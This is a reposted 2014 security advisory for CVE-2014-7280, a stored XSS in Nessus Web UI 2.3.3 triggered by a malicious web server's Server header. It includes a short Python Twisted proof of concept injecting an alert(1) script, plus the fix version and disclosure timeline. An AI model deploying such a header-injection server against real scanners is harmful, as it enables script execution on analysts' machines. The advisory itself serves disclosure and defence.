记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

WEB应用漏洞: - Nessus Web UI 2.3.3 - Stored XSS

2014-10-10 06:35
Nessus Web UI 2.3.3: Stored XSS
=========================================================

CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08

-- Info --

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.

-- Affected version -

Web UI version 2.3.3, Build #83

-- Vulnerability details --

By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.

-- POC --

#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log

class Site(server.Site):
def getResourceFor(self, request):
request.setHeader('server', '<script>alert(1)</script>SomeServer')
return server.Site.getResourceFor(self, request)

class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0

def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"

log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()

-- Solution --

This issue has been fixed as of version 2.3.4 of the WEB UI.


-- Timeline --

2014-06-12 Release of Web UI version 2.3.3, build#83

2014-06-13 Vulnerability discovered and creation of POC

2014-06-13 Vulnerability responsibly reported to vendor

2014-06-13 Vulnerability acknowledged by vendor

2014-06-13 Release of Web UI version 2.3.4, build#85

2014-XX-XX Advisory published in coordination with vendor

-- Credit --

Frank Lycops
Frank.lycops [at] thesecurityfactory.be



知识来源: www.exploit-db.com/exploits/34929

阅读:134265 | 评论:0 | 标签:webapps xss

想收藏或者和大家分享这篇好文章→复制链接地址

“WEB应用漏洞: - Nessus Web UI 2.3.3 - Stored XSS”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云